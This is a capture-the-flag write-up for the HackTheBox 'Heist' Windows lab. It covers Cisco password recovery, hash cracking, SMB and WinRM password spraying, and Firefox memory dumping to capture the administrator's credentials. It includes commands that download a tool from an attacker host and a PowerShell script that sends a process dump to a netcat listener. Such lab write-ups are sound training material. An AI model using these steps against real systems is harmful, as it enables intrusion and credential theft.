HackTheBox - Heist
| Field | Details |
|---|---|
| OS | Windows |
| Difficulty | Easy |
| Release Date | 2019-08-10 |
| Pwned Date | 2026-07-05 |
| Tags | cisco router config cisco password recovery md5crypt hashcat smb netexec winRM impacket-lookupsid hydra evil-winrm firefox dump procdump |
Summary
Heist is an easy difficulty Windows box with a support portal accessible on the web server, from which it is possible to gain Cisco password hashes. These hashes can be cracked, and subsequently RID bruteforce and password spraying are used to gain a foothold on the box. The user is found to be running Firefox. The firefox.exe process can be dumped and searched for the administrator’s password.
Reconnaissance
Port scan
Start with port scanning
python ../../projects/sectools/portscan.py --target <TARGET_IP>
This is a custom tool. If you want to run standard commands run
nmap -p- --min-rate 5000 -oN all_tcp_ports.txt <TARGET_IP>
nmap -sC -sV -p 80,135,445,5985,49669 -oN service_scan.txt <TARGET_IP>
In any case the output should look like this
--- Detected ports ---
port: 80; protocol: tcp; state: open
port: 135; protocol: tcp; state: open
port: 445; protocol: tcp; state: open
port: 5985; protocol: tcp; state: open
port: 49669; protocol: tcp; state: open
--- Detected services ---
Starting Nmap 7.98 ( https://nmap.org ) at 2026-07-03 05:51 -0400
Nmap scan report for 10.129.96.157
Host is up (0.023s latency).
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
| http-title: Support Login Page
|_Requested resource was login.php
135/tcp open msrpc Microsoft Windows RPC
445/tcp open microsoft-ds?
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49669/tcp open msrpc Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: -4s
| smb2-time:
| date: 2026-07-03T09:52:22
|_ start_date: N/A
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 95.24 seconds
Password cracking
Notice port 80, it hosts a support website. It requires to login but also provides the option to login as guest, without credentials.
Log in as guest. You will find an ‘issue’ with an attachment.
The attachment contains a cisco router’s configuration file. The interesting lines are the following
enable secret 5 $1$pdQG$o8nrSzsGXeaduXrjlvKc91
!
username rout3r password 7 0242114B0E143F015F5D1E161713
username admin privilege 15 password 7 02375012182C1A1D751618034F36415408
Each line contains an encrypted password. Cisco ‘password 7’ are just encrypted with a fixed XOR key and can be decrypted easily.
You can use an online tool such as https://passwordrecovery.io/cisco/
You will find:
- 0242114B0E143F015F5D1E161713 → $uperP@ssword
- 02375012182C1A1D751618034F36415408 → Q4)sJu\Y8qz*A3?d
The ‘secret 5’ line uses MD5 hashing (md5crypt) and can be cracked with hashcat
Create a file with the hash
cat cisco.hash
$1$pdQG$o8nrSzsGXeaduXrjlvKc91
Run hashcat
hashcat -m 500 -a 0 cisco.hash /usr/share/wordlists/rockyou.txt.gz
hashcat (v7.1.2) starting
OpenCL API (OpenCL 3.0 PoCL 6.0+debian Linux, None+Asserts, RELOC, SPIR-V, LLVM 18.1.8, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
====================================================================================================================================================
* Device #01: cpu-penryn-QEMU Virtual CPU version 2.5+, 2948/5896 MB (1024 MB allocatable), 8MCU
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Minimum salt length supported by kernel: 0
Maximum salt length supported by kernel: 256
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Optimizers applied:
* Zero-Byte
* Single-Hash
* Single-Salt
ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.
Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.
Host memory allocated for this attack: 514 MB (5306 MB free)
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt.gz
* Passwords.: 14344385
* Bytes.....: 53357329
* Keyspace..: 14344385
$1$pdQG$o8nrSzsGXeaduXrjlvKc91:stealth1agent
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 500 (md5crypt, MD5 (Unix), Cisco-IOS $1$ (MD5))
Hash.Target......: $1$pdQG$o8nrSzsGXeaduXrjlvKc91
Time.Started.....: Fri Jul 3 07:37:11 2026 (2 mins, 26 secs)
Time.Estimated...: Fri Jul 3 07:39:37 2026 (0 secs)
Kernel.Feature...: Pure Kernel (password length 0-256 bytes)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt.gz)
Guess.Queue......: 1/1 (100.00%)
Speed.#01........: 24168 H/s (10.02ms) @ Accel:33 Loops:1000 Thr:1 Vec:4
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 3543672/14344385 (24.70%)
Rejected.........: 0/3543672 (0.00%)
Restore.Point....: 3543408/14344385 (24.70%)
Restore.Sub.#01..: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#01...: stealth6548 -> steadfastly
Started: Fri Jul 3 07:36:53 2026
Stopped: Fri Jul 3 07:39:38 2026
The password was cracked successfully and is stealth1agent
SMB password spraying
Now you have a bunch of passwords, need to check what access they can provide
Create a ‘users.txt’ file with the usernames found so far on the box
- rout3r (found in router config)
- admin (found in router config)
- hazard (reading the issue you can see Hazard asks the admin to create a user for him on the system)
- Administrator (always present on Windows OS)
Create a ‘passwords.txt’ file with the found passwords
Run hydra to perform SMB spraying
hydra -L users.txt -P passwords.txt -f -V smb2://<TARGET_IP>
Hydra v9.6 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2026-07-03 08:49:43
[WARNING] Workgroup was not specified, using "WORKGROUP"
[DATA] max 12 tasks per 1 server, overall 12 tasks, 12 login tries (l:4/p:3), ~1 try per task
[DATA] attacking smb2://10.129.96.157:445/
[ATTEMPT] target 10.129.96.157 - login "rout3r" - pass "$uperP@ssword" - 1 of 12 [child 0] (0/0)
[ATTEMPT] target 10.129.96.157 - login "rout3r" - pass "Q4)sJu\Y8qz*A3?d" - 2 of 12 [child 1] (0/0)
[ATTEMPT] target 10.129.96.157 - login "rout3r" - pass "stealth1agent" - 3 of 12 [child 2] (0/0)
[ATTEMPT] target 10.129.96.157 - login "admin" - pass "$uperP@ssword" - 4 of 12 [child 3] (0/0)
[ATTEMPT] target 10.129.96.157 - login "admin" - pass "Q4)sJu\Y8qz*A3?d" - 5 of 12 [child 4] (0/0)
[ATTEMPT] target 10.129.96.157 - login "admin" - pass "stealth1agent" - 6 of 12 [child 5] (0/0)
[ATTEMPT] target 10.129.96.157 - login "hazard" - pass "$uperP@ssword" - 7 of 12 [child 6] (0/0)
[ATTEMPT] target 10.129.96.157 - login "hazard" - pass "Q4)sJu\Y8qz*A3?d" - 8 of 12 [child 7] (0/0)
[ATTEMPT] target 10.129.96.157 - login "hazard" - pass "stealth1agent" - 9 of 12 [child 8] (0/0)
[ATTEMPT] target 10.129.96.157 - login "Administrator" - pass "$uperP@ssword" - 10 of 12 [child 9] (0/0)
[ATTEMPT] target 10.129.96.157 - login "Administrator" - pass "Q4)sJu\Y8qz*A3?d" - 11 of 12 [child 10] (0/0)
[ATTEMPT] target 10.129.96.157 - login "Administrator" - pass "stealth1agent" - 12 of 12 [child 11] (0/0)
[WARNING] 10.129.96.157 might accept any credential
[445][smb2] host: 10.129.96.157 login: hazard password: stealth1agent
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2026-07-03 08:49:43
Hydra found a valid username/password combination: login: hazard password: stealth1agent
You can try enumerating SMB shares but they are all default shares, not very interesting.
Users enumeration
You can’t get remote access yet with the current credentials but you can enumerate all the users on the system with impacket
impacket-lookupsid hazard:stealth1agent@<TARGET_IP>
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Brute forcing SIDs at 10.129.96.157
[*] StringBinding ncacn_np:10.129.96.157[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-4254423774-1266059056-3197185112
500: SUPPORTDESK\Administrator (SidTypeUser)
501: SUPPORTDESK\Guest (SidTypeUser)
503: SUPPORTDESK\DefaultAccount (SidTypeUser)
504: SUPPORTDESK\WDAGUtilityAccount (SidTypeUser)
513: SUPPORTDESK\None (SidTypeGroup)
1008: SUPPORTDESK\Hazard (SidTypeUser)
1009: SUPPORTDESK\support (SidTypeUser)
1012: SUPPORTDESK\Chase (SidTypeUser)
1013: SUPPORTDESK\Jason (SidTypeUser)
winRM password spraying
Add the discovered users in the users.txt file and run password spraying against winRM
netexec winrm <TARGET_IP> -u users.txt -p passwords.txt --continue-on-success
WINRM 10.129.96.157 5985 SUPPORTDESK [*] Windows 10 / Server 2019 Build 17763 (name:SUPPORTDESK) (domain:SupportDesk)
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from cryptography.hazmat.primitives.ciphers.algorithms in 48.0.0.
arc4 = algorithms.ARC4(self._key)
WINRM 10.129.96.157 5985 SUPPORTDESK [-] SupportDesk\rout3r:$uperP@ssword
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from cryptography.hazmat.primitives.ciphers.algorithms in 48.0.0.
arc4 = algorithms.ARC4(self._key)
WINRM 10.129.96.157 5985 SUPPORTDESK [-] SupportDesk\admin:$uperP@ssword
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from cryptography.hazmat.primitives.ciphers.algorithms in 48.0.0.
arc4 = algorithms.ARC4(self._key)
WINRM 10.129.96.157 5985 SUPPORTDESK [-] SupportDesk\hazard:$uperP@ssword
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from cryptography.hazmat.primitives.ciphers.algorithms in 48.0.0.
arc4 = algorithms.ARC4(self._key)
WINRM 10.129.96.157 5985 SUPPORTDESK [-] SupportDesk\Administrator:$uperP@ssword
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from cryptography.hazmat.primitives.ciphers.algorithms in 48.0.0.
arc4 = algorithms.ARC4(self._key)
WINRM 10.129.96.157 5985 SUPPORTDESK [-] SupportDesk\support:$uperP@ssword
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from cryptography.hazmat.primitives.ciphers.algorithms in 48.0.0.
arc4 = algorithms.ARC4(self._key)
WINRM 10.129.96.157 5985 SUPPORTDESK [-] SupportDesk\Chase:$uperP@ssword
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from cryptography.hazmat.primitives.ciphers.algorithms in 48.0.0.
arc4 = algorithms.ARC4(self._key)
WINRM 10.129.96.157 5985 SUPPORTDESK [-] SupportDesk\Jason:$uperP@ssword
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from cryptography.hazmat.primitives.ciphers.algorithms in 48.0.0.
arc4 = algorithms.ARC4(self._key)
WINRM 10.129.96.157 5985 SUPPORTDESK [-] SupportDesk\rout3r:Q4)sJu\Y8qz*A3?d
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from cryptography.hazmat.primitives.ciphers.algorithms in 48.0.0.
arc4 = algorithms.ARC4(self._key)
WINRM 10.129.96.157 5985 SUPPORTDESK [-] SupportDesk\admin:Q4)sJu\Y8qz*A3?d
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from cryptography.hazmat.primitives.ciphers.algorithms in 48.0.0.
arc4 = algorithms.ARC4(self._key)
WINRM 10.129.96.157 5985 SUPPORTDESK [-] SupportDesk\hazard:Q4)sJu\Y8qz*A3?d
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from cryptography.hazmat.primitives.ciphers.algorithms in 48.0.0.
arc4 = algorithms.ARC4(self._key)
WINRM 10.129.96.157 5985 SUPPORTDESK [-] SupportDesk\Administrator:Q4)sJu\Y8qz*A3?d
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from cryptography.hazmat.primitives.ciphers.algorithms in 48.0.0.
arc4 = algorithms.ARC4(self._key)
WINRM 10.129.96.157 5985 SUPPORTDESK [-] SupportDesk\support:Q4)sJu\Y8qz*A3?d
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from cryptography.hazmat.primitives.ciphers.algorithms in 48.0.0.
arc4 = algorithms.ARC4(self._key)
WINRM 10.129.96.157 5985 SUPPORTDESK [+] SupportDesk\Chase:Q4)sJu\Y8qz*A3?d (Pwn3d!)
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from cryptography.hazmat.primitives.ciphers.algorithms in 48.0.0.
arc4 = algorithms.ARC4(self._key)
WINRM 10.129.96.157 5985 SUPPORTDESK [-] SupportDesk\Jason:Q4)sJu\Y8qz*A3?d
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from cryptography.hazmat.primitives.ciphers.algorithms in 48.0.0.
arc4 = algorithms.ARC4(self._key)
WINRM 10.129.96.157 5985 SUPPORTDESK [-] SupportDesk\rout3r:stealth1agent
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from cryptography.hazmat.primitives.ciphers.algorithms in 48.0.0.
arc4 = algorithms.ARC4(self._key)
WINRM 10.129.96.157 5985 SUPPORTDESK [-] SupportDesk\admin:stealth1agent
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from cryptography.hazmat.primitives.ciphers.algorithms in 48.0.0.
arc4 = algorithms.ARC4(self._key)
WINRM 10.129.96.157 5985 SUPPORTDESK [-] SupportDesk\hazard:stealth1agent
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from cryptography.hazmat.primitives.ciphers.algorithms in 48.0.0.
arc4 = algorithms.ARC4(self._key)
WINRM 10.129.96.157 5985 SUPPORTDESK [-] SupportDesk\Administrator:stealth1agent
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from cryptography.hazmat.primitives.ciphers.algorithms in 48.0.0.
arc4 = algorithms.ARC4(self._key)
WINRM 10.129.96.157 5985 SUPPORTDESK [-] SupportDesk\support:stealth1agent
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from cryptography.hazmat.primitives.ciphers.algorithms in 48.0.0.
arc4 = algorithms.ARC4(self._key)
WINRM 10.129.96.157 5985 SUPPORTDESK [-] SupportDesk\Jason:stealth1agent
Notice the line [+] SupportDesk\Chase:Q4)sJu\Y8qz*A3?d (Pwn3d!)
The command discovered the password for the chase account -> Q4)sJu\Y8qz*A3?d
Initial access
Use chase’s password for winRM access
evil-winrm -i <TARGET_IP> -u chase -p 'Q4)sJu\Y8qz*A3?d'
Evil-WinRM shell v3.9
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Chase\Documents> whoami
supportdesk\chase
Privilege escalation
Chase’s desktop folder contains a todo file
*Evil-WinRM* PS C:\Users\Chase\Desktop> type todo.txt
Stuff to-do:
1. Keep checking the issues list.
2. Fix the router config.
Done:
1. Restricted access for guest user.
The todo list hints to an ongoing checking of the issues list
Check running processes
ps
Handles NPM(K) PM(K) WS(K) CPU(s) Id SI ProcessName
------- ------ ----- ----- ------ -- -- -----------
464 18 2244 5292 360 0 csrss
290 13 2220 5056 476 1 csrss
357 15 3516 14408 3960 1 ctfmon
252 14 3956 13356 3844 0 dllhost
166 9 1864 9588 0.02 6816 1 dllhost
617 32 29968 57856 960 1 dwm
1494 58 23856 78264 5164 1 explorer
355 25 16448 39208 0.23 6328 1 firefox
1071 69 145972 222560 5.20 6456 1 firefox
347 19 10196 39672 0.03 6564 1 firefox
401 34 34984 93524 0.63 6720 1 firefox
378 28 22776 59604 0.30 6976 1 firefox
49 6 1500 3788 780 0 fontdrvhost
49 6 1792 4504 788 1 fontdrvhost
0 0 56 8 0 0 Idle
972 23 6144 15196 632 0 lsass
223 13 3188 10232 3780 0 msdtc
0 12 324 14272 88 0 Registry
144 8 1612 7312 5672 1 RuntimeBroker
302 16 5484 16816 5772 1 RuntimeBroker
272 14 3032 14808 5976 1 RuntimeBroker
661 32 19644 60784 5600 1 SearchUI
542 11 5464 9888 608 0 services
691 29 15036 51056 5480 1 ShellExperienceHost
439 17 4888 23876 4932 1 sihost
53 3 528 1124 264 0 smss
471 23 5808 16204 2388 0 spoolsv
285 13 4096 11168 308 0 svchost
149 9 1720 11436 640 0 svchost
199 12 2064 9448 708 0 svchost
85 5 892 3768 736 0 svchost
857 20 7048 22252 760 0 svchost
859 16 5216 11588 860 0 svchost
115 7 1232 5124 876 0 svchost
256 11 2012 7564 908 0 svchost
375 13 10508 14384 1084 0 svchost
126 16 3500 7308 1192 0 svchost
215 9 2088 7412 1212 0 svchost
184 9 1808 7416 1232 0 svchost
228 12 2548 11136 1240 0 svchost
429 9 2736 8740 1252 0 svchost
154 7 1208 5496 1268 0 svchost
140 7 1316 5560 1356 0 svchost
170 10 1800 7912 1404 0 svchost
348 14 4596 11704 1464 0 svchost
235 11 2504 9620 1476 0 svchost
303 12 2000 8628 1492 0 svchost
239 14 3316 8464 1500 0 svchost
191 12 2084 11872 1552 0 svchost
266 14 3672 12696 1564 0 svchost
364 17 4996 13948 1568 0 svchost
163 10 1928 7312 1624 0 svchost
322 10 2528 8260 1736 0 svchost
402 32 7884 16604 1744 0 svchost
194 11 1960 8232 1832 0 svchost
163 9 3064 7628 1860 0 svchost
162 9 2336 7400 1872 0 svchost
210 11 2684 11700 2044 0 svchost
166 12 3912 10676 2456 0 svchost
179 22 2492 9704 2464 0 svchost
261 13 2516 7748 2472 0 svchost
506 21 12432 26940 2480 0 svchost
394 16 11080 19920 2512 0 svchost
133 9 1628 6468 2548 0 svchost
136 8 1520 6080 2576 0 svchost
126 7 1224 5252 2632 0 svchost
231 14 4632 11672 2704 0 svchost
209 12 1852 7368 2712 0 svchost
205 11 2276 8308 2736 0 svchost
266 19 3852 12492 2748 0 svchost
170 10 2148 13140 2772 0 svchost
463 17 3300 11668 2840 0 svchost
383 23 3400 12236 2956 0 svchost
129 7 1572 6208 3044 0 svchost
333 18 14968 31468 3536 0 svchost
194 15 6016 10008 4220 0 svchost
161 9 4104 11856 4300 0 svchost
171 9 1472 7184 4332 0 svchost
223 11 2812 10864 4420 0 svchost
170 11 2596 13284 4716 0 svchost
228 12 3036 13508 4944 1 svchost
370 18 5368 26944 4968 1 svchost
249 14 3064 13676 5032 0 svchost
301 20 9968 14580 5188 0 svchost
311 15 14264 16668 5712 0 svchost
122 7 1232 5516 6368 0 svchost
1899 0 188 124 4 0 System
210 20 3916 12236 5004 1 taskhostw
167 11 2916 10824 2676 0 VGAuthService
142 8 1676 6792 2688 0 vm3dservice
136 9 1800 7264 2832 1 vm3dservice
385 22 9708 22032 2720 0 vmtoolsd
236 18 5076 15036 6164 1 vmtoolsd
171 11 1436 6804 468 0 wininit
280 13 2820 12732 524 1 winlogon
341 16 8736 18404 4020 0 WmiPrvSE
1247 37 179648 197240 25.52 6696 0 wsmprovhost
Someone is actively using Firefox on the machine
Process dumping
Download procdump and fetch it on the target.
Run the python http server on your machine
python -m http.server
On the target run
Invoke-WebRequest -Uri http://<ATTACKER_IP>:8000/procdump64.exe -OutFile procdump64.exe
Accept program eula
.\procdump64.exe -accepteula
There are several firefox instance running, dump the one that is consuming more CPU (in my case it was PID 6456)
*Evil-WinRM* PS C:\Users\chase\Desktop> .\procdump64.exe -ma 6456
ProcDump v12.0 - Sysinternals process dump utility
Copyright (C) 2009-2026 Mark Russinovich and Andrew Richards
Sysinternals - www.sysinternals.com
[20:38:16]Dump 1 info: Available space: 3735306240
[20:38:16]Dump 1 initiated: C:\Users\chase\Desktop\firefox.exe_260705_203816.dmp
[20:38:16]Dump 1 writing: Estimated dump file size is 506 MB.
[20:38:20]Dump 1 complete: 506 MB written in 3.7 seconds
[20:38:20]Dump count reached.
Exfiltrate the dump file on your machine
Run on your machine:
nc -lvnp 9001 > firefox.dmp
listening on [any] 9001 ...
On the target run the following script:
$client = New-Object System.Net.Sockets.TcpClient("<ATTACKER_IP>", 9001)
$stream = $client.GetStream()
$fileStream = [System.IO.File]::OpenRead("<FULL_PATH_TO_DMP_FILE>")
$buffer = New-Object byte[] 4096
while (($read = $fileStream.Read($buffer, 0, $buffer.Length)) -gt 0) {
$stream.Write($buffer, 0, $read)
}
$stream.Flush()
$fileStream.Close()
$stream.Close()
$client.Close()
It should work both interactively from a PowerShell prompt or by saving it in a .ps1 file (though I have not tried it interactively)
If you decide to create a .ps1 file, serve it to the target just like you did for the procdump executable.
This file transfer leverages raw TCP and does not require a HTTP server on the target.
You should get a connection on the netcat listener
nc -lvnp 9001 > firefox.dmp
listening on [any] 9001 ...
connect to [10.10.14.131] from (UNKNOWN) [10.129.96.157] 49691
The file is big so the transfer may take a while.
Dump analysis
The file is binary so to extract readable content use the ‘strings’ tool.
Narrow down the search grepping the string ‘htb’. You are looking for credentials so the assumption is that login emails will contain ‘htb’ in the domain.
strings firefox.dmp | grep htb
You will get a lot of garbage but you should also be able to isolate several of these lines
http://localhost/login.php?login_username=admin@support.htb&login_password=4dD!5}x/re8]FBuZ&login=
http://localhost/login.php?login_username=admin@support.htb&login_password=4dD!5}x/re8]FBuZ&login=
http://localhost/login.php?login_username=admin@support.htb&login_password=4dD!5}x/re8]FBuZ&login=
These lines expose the password for admin@support.htb -> 4dD!5}x/re8]FBuZ
Use it to attempt remote access as Administrator
evil-winrm -i <TARGET_IP> -u Administrator -p '4dD!5}x/re8]FBuZ'
Evil-WinRM shell v3.9
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
supportdesk\administrator
Got admin access.